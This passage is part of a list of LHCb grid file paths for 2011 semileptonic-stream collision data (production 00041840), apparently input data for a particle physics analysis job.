'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00019181_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028744_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041298_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061086_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032769_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063691_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018573_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022989_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031994_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065012_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067529_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062551_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037135_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028864_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023193_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038234_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061934_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040758_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046904_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00024482_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046473_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027669_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040858_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031738_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021072_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029857_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044653_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033732_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027688_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042428_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054063_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016763_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060143_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044922_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065438_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016555_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056457_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033492_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056153_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037061_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056939_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067898_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009921_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00011698_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029411_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057707_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069360_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033976_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014613_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00001660_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056440_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041455_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003382_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010460_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061303_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006891_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034111_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068277_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00053628_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007913_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026215_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029612_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025456_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032242_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065983_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054973_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046789_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067159_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051023_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032594_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031105_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044984_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051129_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067813_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028730_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008231_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043643_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002611_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062418_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023931_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014706_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062923_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035932_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059836_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059432_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042337_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023887_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051199_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040950_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00003350_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068466_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068990_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021026_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026345_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012100_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00032567_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021249_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007699_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042338_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054198_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00035770_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027777_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012978_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022128_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036552_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036501_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00058577_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042936_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068793_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033101_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056725_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045036_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057721_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00069214_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063971_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063007_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046472_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006947_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00006274_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025651_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012429_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039362_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062300_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031888_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033568_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00046137_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00040614_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051314_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005953_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068941_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065266_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022855_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022261_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009935_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00020605_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00054094_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00014379_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015014_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005655_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057315_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00060053_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00036057_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027948_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045001_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00009524_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00038316_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00048954_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00039363_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018344_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00013076_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015439_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042650_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023216_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059406_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00030246_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067959_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00041200_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00066279_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068670_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00010258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055771_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00057498_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00027681_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062925_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026818_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012710_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063288_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00045908_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042267_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042268_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00022172_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00021224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047224_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062257_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059232_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065091_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042426_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047733_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00005798_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004229_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00065609_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068407_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00049459_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00015513_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00061631_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00023474_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00028388_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00034630_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00064467_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00018030_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037410_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00004532_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00056154_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031102_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00052565_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00031794_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00025531_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00042775_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00037979_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00051940_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050258_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00062942_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00029906_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00067708_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00044684_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033881_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00047719_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0004/00041840_00043685_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00012058_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00055251_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00002528_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00050621_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033582_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026704_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00007664_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00063164_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033013_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0002/00041840_00026637_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068328_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0006/00041840_00068044_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0001/00041840_00016122_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0005/00041840_00059211_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00000212_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0003/00041840_00033104_1.semileptonic.dst',
'LFN:/lhcb/LHCb/Collision11/SEMILEPTONIC.DST/00041840/0000/00041840_00008321_1.semileptonic.dst',
